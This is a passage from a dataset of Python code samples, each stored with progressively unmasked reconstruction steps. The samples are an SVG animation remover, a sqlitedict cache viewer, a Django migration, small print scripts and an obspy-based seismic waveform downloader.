process(inpt, outp)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: ascii -*-\n\n\"\"\"\nA script removing animations from SVG graphics.\n\"\"\"\n\nimport sys, os, re\n\n# etree fails utterly at producing nice-looking XML\nfrom xml.dom import minidom\n\ndef process(inpt, outp):\n def traverse(node):\n for child in node.childNodes:\n if child.nodeType != minidom.Node.ELEMENT_NODE:\n continue\n elif child.tagName in ('animate', 'animateTransform'):\n node.removeChild(child)\n elif child.tagName in ('style', 'script'):\n if child.getAttribute('key') == 'animation':\n node.removeChild(child)\n else:\n traverse(child)\n node.normalize()\n if len(node.childNodes) == 0: return\n for child in (node.childNodes[0], node.childNodes[-1]):\n if child.nodeType != minidom.Node.TEXT_NODE:\n continue\n if not child.data.isspace() or child.data.count('\\n') <= 1:\n continue\n if len(node.childNodes) == 1:\n node.removeChild(child)\n return\n child.data = re.sub(r'\\n.*\\n', r'\\n', child.data)\n document = minidom.parse(inpt)\n traverse(document.documentElement)\n outp.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n')\n document.documentElement.writexml(outp)\n outp.write('\\n')\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\nif __name__ == '__main__': main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
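The SVG-cleaning sample above already exposes process() through main(); a minimal sketch of calling process() directly when the script is imported as a module, with illustrative file names:

# Hypothetical direct use of process() from the script above, bypassing main().
with open("figure.svg") as inpt, open("figure_static.svg", "w") as outp:
    process(inpt, outp)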
from sqlitedict import SqliteDict
import sys
import socket
import urllib
import argparse
import zlib, pickle, sqlite3
import random
from datetime import datetime
import time
from urllib.parse import urlparse
import hashlib
import subprocess
import requests
from multiprocessing import Pool
def gz_encode(obj):
    return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)))

def gz_decode(obj):
    return pickle.loads(zlib.decompress(bytes(obj)))


if __name__=="__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--dnscache', default="dnscache.sqld", help='IP address cache default: %(default)s')
    parser.add_argument('--download', default="pages.sqld", help='Here is where the downloaded pages go: %(default)s')
    parser.add_argument('--r404', default="404.sqld", help='Here is where we remember pages that gave 404 etc: %(default)s')
    args = parser.parse_args()

    #2) Results setup
    result_store = SqliteDict(args.download, encode=gz_encode, decode=gz_decode, autocommit=True)
    for url,cont in result_store.items():
        print(url,cont[:30])

    #3) 404 setup
    r404 = SqliteDict(args.r404, autocommit=True)
    for url,status in r404.items():
        print(url,status)
|
normal
|
{
"blob_id": "295d6a66335491b406f47212064da9fd5fca6eb6",
"index": 6812,
"step-1": "<mask token>\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default='dnscache.sqld', help=\n 'IP address cache default: %(default)s')\n parser.add_argument('--download', default='pages.sqld', help=\n 'Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default='404.sqld', help=\n 'Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n result_store = SqliteDict(args.download, encode=gz_encode, decode=\n gz_decode, autocommit=True)\n for url, cont in result_store.items():\n print(url, cont[:30])\n r404 = SqliteDict(args.r404, autocommit=True)\n for url, status in r404.items():\n print(url, status)\n",
"step-4": "from sqlitedict import SqliteDict\nimport sys\nimport socket\nimport urllib\nimport argparse\nimport zlib, pickle, sqlite3\nimport random\nfrom datetime import datetime\nimport time\nfrom urllib.parse import urlparse\nimport hashlib\nimport subprocess\nimport requests\nfrom multiprocessing import Pool\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default='dnscache.sqld', help=\n 'IP address cache default: %(default)s')\n parser.add_argument('--download', default='pages.sqld', help=\n 'Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default='404.sqld', help=\n 'Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n result_store = SqliteDict(args.download, encode=gz_encode, decode=\n gz_decode, autocommit=True)\n for url, cont in result_store.items():\n print(url, cont[:30])\n r404 = SqliteDict(args.r404, autocommit=True)\n for url, status in r404.items():\n print(url, status)\n",
"step-5": "from sqlitedict import SqliteDict\nimport sys\nimport socket\nimport urllib\nimport argparse\nimport zlib, pickle, sqlite3\nimport random\nfrom datetime import datetime\nimport time\nfrom urllib.parse import urlparse\nimport hashlib\nimport subprocess\nimport requests\nfrom multiprocessing import Pool\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)))\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default=\"dnscache.sqld\", help='IP address cache default: %(default)s')\n parser.add_argument('--download', default=\"pages.sqld\", help='Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default=\"404.sqld\", help='Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n\n #2) Results setup\n result_store = SqliteDict(args.download, encode=gz_encode, decode=gz_decode, autocommit=True)\n\n for url,cont in result_store.items():\n print(url,cont[:30])\n \n #3) 404 setup\n r404 = SqliteDict(args.r404, autocommit=True)\n for url,status in r404.items():\n print(url,status)\n \n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
a=10
b=20
c=400
d=100
e=500
f=30
z=a+b+c+d+e+f
print "The total sum is",z
print "variable d added"
print "Variable e added"
print "Variable f is equal to 30"
print "You are coming from test branch"
print "Your are very new in this branch"
|
normal
|
{
"blob_id": "700d876dd45548b74b563ed86f8124fa666e1739",
"index": 2588,
"step-1": "a=10\nb=20\nc=400\nd=100\ne=500\nf=30\nz=a+b+c+d+e+f\nprint \"The total sum is\",z\nprint \"variable d added\"\nprint \"Variable e added\"\nprint \"Variable f is equal to 30\"\nprint \"You are coming from test branch\"\nprint \"Your are very new in this branch\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Generated by Django 2.0.1 on 2018-05-01 11:46
from django.db import migrations, models
class Migration(migrations.Migration):
    dependencies = [
        ('rover', '0002_auto_20180501_1431'),
    ]

    operations = [
        migrations.CreateModel(
            name='RoverPage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('design_review', models.FileField(blank=True, upload_to='documents/rover')),
            ],
            options={
                'verbose_name_plural': 'Rover Page',
                'verbose_name': 'Rover Page',
            },
        ),
    ]
|
normal
|
{
"blob_id": "fed94e0affa1fe6c705577a63fabee839aa9f05c",
"index": 5096,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('rover', '0002_auto_20180501_1431')]\n operations = [migrations.CreateModel(name='RoverPage', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('design_review', models.FileField(\n blank=True, upload_to='documents/rover'))], options={\n 'verbose_name_plural': 'Rover Page', 'verbose_name': 'Rover Page'})]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('rover', '0002_auto_20180501_1431')]\n operations = [migrations.CreateModel(name='RoverPage', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('design_review', models.FileField(\n blank=True, upload_to='documents/rover'))], options={\n 'verbose_name_plural': 'Rover Page', 'verbose_name': 'Rover Page'})]\n",
"step-5": "# Generated by Django 2.0.1 on 2018-05-01 11:46\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rover', '0002_auto_20180501_1431'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RoverPage',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('design_review', models.FileField(blank=True, upload_to='documents/rover')),\n ],\n options={\n 'verbose_name_plural': 'Rover Page',\n 'verbose_name': 'Rover Page',\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
print(1/2 * 2) # division ret
|
normal
|
{
"blob_id": "2c1e51f2c392e77299463d95a2277b3d2ca7c299",
"index": 4336,
"step-1": "<mask token>\n",
"step-2": "print(1 / 2 * 2)\n",
"step-3": "print(1/2 * 2) # division ret\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
def test(x):
    print x
|
normal
|
{
"blob_id": "78e008b4a51cdbbb81dead7bc5945ee98ccad862",
"index": 8266,
"step-1": "def test(x):\n print x\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
"""
@version:
author:yunnaidan
@time: 2019/07/22
@file: download_mseed.py
@function:
"""
from obspy.clients.fdsn import Client
from obspy.core import UTCDateTime
import numpy as np
import obspy
import os
import re
import time
import glob
import shutil
import platform
import subprocess
import multiprocessing
def load_stations(filename):
    with open(filename, 'r') as f:
        sta_data = f.readlines()
    sta_list = []
    for l in range(1, len(sta_data)):
        sta_info = sta_data[l]
        net_name = re.split(',', sta_info)[0]
        sta_name = re.split(',', sta_info)[1]
        chan_name = re.split(',', sta_info)[2]
        sta_list.append([net_name, sta_name, chan_name])
    return sta_list


def set_folders(out_path, startday, endday):
    day = startday
    while day <= endday:
        year_folder = str(day.year).zfill(4)
        day_folder = str(day.year).zfill(4) + str(day.month).zfill(2) + str(day.day).zfill(2)
        out_folder = os.path.join(out_path, year_folder, day_folder)
        if not os.path.exists(out_folder):
            os.makedirs(out_folder)
        day = day + 86400
    return None


def obspy_download(client, net_name, sta_name, chn_name, starttime, endtime,
                   out_path, time_thre=10):
    year_folder = str(starttime.year)
    day_folder = str(starttime.year).zfill(4) + str(starttime.month).zfill(2) + str(starttime.day).zfill(2)
    out_folder = os.path.join(out_path, year_folder, day_folder)
    outfile = os.path.join(out_folder, net_name + '.' + sta_name + '.' + chn_name + '.mseed')
    # Incremental download
    if not os.path.exists(outfile):
        t = 0
        flag = False
        while flag == False and t < time_thre:
            try:
                client.get_waveforms(
                    network=net_name,
                    station=sta_name,
                    location='--',
                    channel=chn_name,
                    starttime=starttime,
                    endtime=endtime,
                    filename=outfile)
                flag = True
            except BaseException:
                pass
            time.sleep(0.5)
            t += 1
        if not flag:
            with open('download.log', 'a') as f:
                f.write('No data: ' + outfile + '\n')
    return None


def obspy_download_parallel(data_center, startday, endday, sta_file, out_path, cores=1):
    set_folders(out_path, startday, endday)
    sta_list = load_stations(sta_file)
    with open('download.log', 'a') as f:
        f.write('>>> ' + str(time.localtime(time.time())) + '\n')
        f.write('The number of stations is: ' + str(len(sta_list)) + '\n')
    day = startday
    while day <= endday:
        t_b = time.time()
        with open('download.log', 'a') as f:
            f.write('Day: ' + str(day) + '\n')
        print(day)
        starttime = day
        endtime = day + 86400
        client = Client(data_center)
        if cores == 1:
            for i in range(len(sta_list)):
                sta = sta_list[i]
                print(sta)
                net_name = sta[0]
                sta_name = sta[1]
                chan_name = sta[2]
                obspy_download(client, net_name, sta_name, chan_name,
                               starttime, endtime, out_path)
        else:
            pass
        t_e = time.time()
        with open('download.log', 'a') as f:
            f.write('Using time: ' + str(t_e - t_b) + '\n')
        day = day + 86400
    return None


def stp_run_download(sta_list, download_date, out_path):
    with open('download.log', 'a') as f:
        f.write(str(download_date) + '\n')
    tb = time.time()
    year = str(download_date.year).zfill(4)
    month = str(download_date.month).zfill(2)
    day = str(download_date.day).zfill(2)
    day_folder = year + month + day
    out_folder = os.path.join(out_path, year, day_folder)
    out_folder_old = os.path.join(out_path + '_old', year, day_folder)
    p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)
    s = "MSEED \n"
    for i in range(len(sta_list)):
        sta = sta_list[i]
        net_name = sta[0]
        sta_name = sta[1]
        chan_name = sta[2]
        out_sta_file = glob.glob(os.path.join(
            out_folder_old, '*%s.%s.%s*' % (net_name, sta_name, chan_name)))
        if len(out_sta_file) == 0:
            s += "WIN {} {} {} {}/{}/{},00:00:00 +1d \n".format(
                net_name, sta_name, chan_name, year, month, day)
    s += "quit \n"
    p.communicate(s.encode())
    out_files = glob.glob('%s%s%s*.*' % (year, month, day))
    for out_file in out_files:
        shutil.move(out_file, out_folder)
    te = time.time()
    with open('download.log', 'a') as f:
        f.write('Using time: ' + str(te - tb) + '\n')


def stp_download_parallel(startday, endday, sta_file, out_path, cores=1):
    '''
    :param startday: obspy.core.utcdatetime.UTCDateTime
    :param endday: obspy.core.utcdatetime.UTCDateTime
    :param sta_file: Network,Station,Channel,Latitude,Longitude
    :param out_path:
    :param cores:
    :return:
    '''
    if os.path.exists('download.log'):
        os.remove('download.log')
    with open('download.log', 'a') as f:
        f.write('>>> ' + str(time.localtime(time.time())) + '\n')
    set_folders(out_path, startday, endday)
    sta_list = load_stations(sta_file)
    pool = multiprocessing.Pool(processes=cores)
    tasks = []
    day = startday
    while day <= endday:
        print(day)
        # tasks.append((sta_list, day, out_path))
        stp_run_download(sta_list, day, out_path)
        day = day + 86400
    '''
    # chunksize is how many tasks will be processed by one processor
    rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)
    # close() & join() is necessary
    # No more work
    pool.close()

    # simple progress bar
    while (True):
        remaining = rs._number_left
        print("finished:{0}/{1}".format(len(tasks) - remaining, len(tasks)),
              end='\r')  # '\r' means remove the last line
        if (rs.ready()):
            break
        time.sleep(0.5)

    # Wait for completion
    pool.join()
    '''
    return None


if __name__ == '__main__':
    LOCAL_PATH = '/Users/yunnaidan/Project/Dynamic_Triggering/Workspace/Central_California'
    REMOTE_PATH = '/home/yunnd/Workspace/Dynamic_triggering/Central_California'
    if platform.system() == 'Darwin':
        ROOT_PATH = LOCAL_PATH
    if platform.system() == 'Linux':
        ROOT_PATH = REMOTE_PATH

    startday = UTCDateTime('2009-01-03')
    endday = UTCDateTime('2009-01-05')
    sta_file = os.path.join(
        ROOT_PATH,
        'data/station_info/stations_CI_selected_for_download_BH.txt')
    out_path = os.path.join(ROOT_PATH, 'data/time_series/raw_data/mseed')
    data_center = 'SCEDC'

    obspy_download_parallel(
        data_center,
        startday,
        endday,
        sta_file,
        out_path,
        cores=1)
    # stp_download_parallel(startday, endday, sta_file, out_path, cores=15)
    pass
|
normal
|
{
"blob_id": "34db3c9998e1d7647dd954e82e18147504cc74fc",
"index": 6736,
"step-1": "<mask token>\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n return sta_list\n\n\n<mask token>\n\n\ndef obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1):\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n client = Client(data_center)\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print(sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(client, net_name, sta_name, chan_name,\n starttime, endtime, out_path)\n else:\n pass\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n return None\n\n\n<mask token>\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n \"\"\"\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n \"\"\"\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n day = startday\n while day <= endday:\n print(day)\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n '\\n # chunksize is how many tasks will be processed by one processor\\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\\n # close() & join() is necessary\\n # No more work\\n pool.close()\\n\\n # simple progress bar\\n while (True):\\n remaining = rs._number_left\\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\\n end=\\'\\r\\') # \\'\\r\\' means remove the last line\\n if (rs.ready()):\\n break\\n time.sleep(0.5)\\n\\n # Wait for completion\\n pool.join()\\n '\n return None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n return sta_list\n\n\ndef set_folders(out_path, startday, endday):\n day = startday\n while day <= endday:\n year_folder = str(day.year).zfill(4)\n day_folder = str(day.year).zfill(4) + str(day.month).zfill(2) + str(day\n .day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n day = day + 86400\n return None\n\n\n<mask token>\n\n\ndef obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1):\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n client = Client(data_center)\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print(sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(client, net_name, sta_name, chan_name,\n starttime, endtime, out_path)\n else:\n pass\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n return None\n\n\ndef stp_run_download(sta_list, download_date, out_path):\n with open('download.log', 'a') as f:\n f.write(str(download_date) + '\\n')\n tb = time.time()\n year = str(download_date.year).zfill(4)\n month = str(download_date.month).zfill(2)\n day = str(download_date.day).zfill(2)\n day_folder = year + month + day\n out_folder = os.path.join(out_path, year, day_folder)\n out_folder_old = os.path.join(out_path + '_old', year, day_folder)\n p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)\n s = 'MSEED \\n'\n for i in range(len(sta_list)):\n sta = sta_list[i]\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n out_sta_file = glob.glob(os.path.join(out_folder_old, '*%s.%s.%s*' %\n (net_name, sta_name, chan_name)))\n if len(out_sta_file) == 0:\n s += 'WIN {} {} {} {}/{}/{},00:00:00 +1d \\n'.format(net_name,\n sta_name, chan_name, year, month, day)\n s += 'quit \\n'\n p.communicate(s.encode())\n out_files = glob.glob('%s%s%s*.*' % (year, month, day))\n for out_file in out_files:\n shutil.move(out_file, out_folder)\n te = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(te - tb) + '\\n')\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n \"\"\"\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n \"\"\"\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n day = startday\n while day <= endday:\n 
print(day)\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n '\\n # chunksize is how many tasks will be processed by one processor\\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\\n # close() & join() is necessary\\n # No more work\\n pool.close()\\n\\n # simple progress bar\\n while (True):\\n remaining = rs._number_left\\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\\n end=\\'\\r\\') # \\'\\r\\' means remove the last line\\n if (rs.ready()):\\n break\\n time.sleep(0.5)\\n\\n # Wait for completion\\n pool.join()\\n '\n return None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n return sta_list\n\n\ndef set_folders(out_path, startday, endday):\n day = startday\n while day <= endday:\n year_folder = str(day.year).zfill(4)\n day_folder = str(day.year).zfill(4) + str(day.month).zfill(2) + str(day\n .day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n day = day + 86400\n return None\n\n\ndef obspy_download(client, net_name, sta_name, chn_name, starttime, endtime,\n out_path, time_thre=10):\n year_folder = str(starttime.year)\n day_folder = str(starttime.year).zfill(4) + str(starttime.month).zfill(2\n ) + str(starttime.day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n outfile = os.path.join(out_folder, net_name + '.' + sta_name + '.' +\n chn_name + '.mseed')\n if not os.path.exists(outfile):\n t = 0\n flag = False\n while flag == False and t < time_thre:\n try:\n client.get_waveforms(network=net_name, station=sta_name,\n location='--', channel=chn_name, starttime=starttime,\n endtime=endtime, filename=outfile)\n flag = True\n except BaseException:\n pass\n time.sleep(0.5)\n t += 1\n if not flag:\n with open('download.log', 'a') as f:\n f.write('No data: ' + outfile + '\\n')\n return None\n\n\ndef obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1):\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n client = Client(data_center)\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print(sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(client, net_name, sta_name, chan_name,\n starttime, endtime, out_path)\n else:\n pass\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n return None\n\n\ndef stp_run_download(sta_list, download_date, out_path):\n with open('download.log', 'a') as f:\n f.write(str(download_date) + '\\n')\n tb = time.time()\n year = str(download_date.year).zfill(4)\n month = str(download_date.month).zfill(2)\n day = str(download_date.day).zfill(2)\n day_folder = year + month + day\n out_folder = os.path.join(out_path, year, day_folder)\n out_folder_old = os.path.join(out_path + '_old', year, day_folder)\n p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)\n s = 'MSEED \\n'\n for i in range(len(sta_list)):\n sta = sta_list[i]\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n out_sta_file = glob.glob(os.path.join(out_folder_old, '*%s.%s.%s*' %\n (net_name, sta_name, chan_name)))\n if len(out_sta_file) == 0:\n s += 'WIN {} {} {} {}/{}/{},00:00:00 +1d \\n'.format(net_name,\n sta_name, chan_name, year, month, day)\n s += 'quit \\n'\n p.communicate(s.encode())\n out_files = glob.glob('%s%s%s*.*' % (year, month, day))\n for 
out_file in out_files:\n shutil.move(out_file, out_folder)\n te = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(te - tb) + '\\n')\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n \"\"\"\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n \"\"\"\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n day = startday\n while day <= endday:\n print(day)\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n '\\n # chunksize is how many tasks will be processed by one processor\\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\\n # close() & join() is necessary\\n # No more work\\n pool.close()\\n\\n # simple progress bar\\n while (True):\\n remaining = rs._number_left\\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\\n end=\\'\\r\\') # \\'\\r\\' means remove the last line\\n if (rs.ready()):\\n break\\n time.sleep(0.5)\\n\\n # Wait for completion\\n pool.join()\\n '\n return None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n return sta_list\n\n\ndef set_folders(out_path, startday, endday):\n day = startday\n while day <= endday:\n year_folder = str(day.year).zfill(4)\n day_folder = str(day.year).zfill(4) + str(day.month).zfill(2) + str(day\n .day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n day = day + 86400\n return None\n\n\ndef obspy_download(client, net_name, sta_name, chn_name, starttime, endtime,\n out_path, time_thre=10):\n year_folder = str(starttime.year)\n day_folder = str(starttime.year).zfill(4) + str(starttime.month).zfill(2\n ) + str(starttime.day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n outfile = os.path.join(out_folder, net_name + '.' + sta_name + '.' +\n chn_name + '.mseed')\n if not os.path.exists(outfile):\n t = 0\n flag = False\n while flag == False and t < time_thre:\n try:\n client.get_waveforms(network=net_name, station=sta_name,\n location='--', channel=chn_name, starttime=starttime,\n endtime=endtime, filename=outfile)\n flag = True\n except BaseException:\n pass\n time.sleep(0.5)\n t += 1\n if not flag:\n with open('download.log', 'a') as f:\n f.write('No data: ' + outfile + '\\n')\n return None\n\n\ndef obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1):\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n client = Client(data_center)\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print(sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(client, net_name, sta_name, chan_name,\n starttime, endtime, out_path)\n else:\n pass\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n return None\n\n\ndef stp_run_download(sta_list, download_date, out_path):\n with open('download.log', 'a') as f:\n f.write(str(download_date) + '\\n')\n tb = time.time()\n year = str(download_date.year).zfill(4)\n month = str(download_date.month).zfill(2)\n day = str(download_date.day).zfill(2)\n day_folder = year + month + day\n out_folder = os.path.join(out_path, year, day_folder)\n out_folder_old = os.path.join(out_path + '_old', year, day_folder)\n p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)\n s = 'MSEED \\n'\n for i in range(len(sta_list)):\n sta = sta_list[i]\n 